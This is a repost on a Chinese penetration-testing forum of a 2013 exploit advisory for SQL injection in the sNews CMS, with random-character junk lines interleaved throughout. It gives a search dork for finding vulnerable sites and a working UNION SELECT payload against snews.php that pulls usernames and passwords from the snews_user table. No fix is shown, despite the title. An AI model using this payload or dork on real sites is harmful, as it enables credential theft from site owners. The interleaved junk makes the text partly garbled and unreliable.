中国网络渗透测试联盟
标题:
CMS snews SQL注射及修复
[打印本页]
作者:
admin
时间:
2013-1-23 08:55
标题:
CMS snews SQL注射及修复
标题: CMS snews SQL Injection Vulnerability
; ~4 r0 h3 }" T7 b5 a+ V/ h
作者: By onestree
2 r3 |6 e' l- P) h e y
下载地址 :
http://snewscms.com/
6 \9 N% @. n+ X, c% P
测试平台 : ubuntu 12.10 / win 7
+ C* p7 J T* u9 G) T3 g% E& }
关键词: inurl:"tanyakan pada rumput yang bergoyang"
3 G3 `& r0 Z) e4 F, ?& C7 O, b
9 b* D& L( @8 G
1 w* Y5 a* D8 r: E/ o
*************************************************************
' P% s$ i" W% {6 `
* _, _$ _7 O* V
SQL poc:
; ?' b4 u! T- T, r1 J+ W# Z" N
5 ^: s2 O5 L. q4 {$ ~
http://www.2cto.com
/snews/snews.php?act=shownews&id=[SQL]
3 A2 ^; K/ P$ w
( Y9 G/ @2 I& e, X
示例
; k) P% o8 R8 M m6 Z/ N- l
0 h) j% `4 Z% u# x
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
_8 }+ E& x3 B+ `! e3 M
* Y6 J) }0 Q1 O. x' t' o
! A& N% b& ?5 K& E# Q' ^
致谢:
& n, G3 X1 ]$ G% K. C
4 U! U9 L* X& I7 y
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
2 [5 |) [3 g% r# Y7 C
; b" c8 D1 R& G5 x# t3 ~* h2 Q
indonesiancoder - moeslimh4x0r - go-coder
# U- E4 Y8 W4 v1 V6 n
4 T U) R# r& H
spesial my hunny :*
7 ?1 b/ ~: e2 x6 F/ `
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2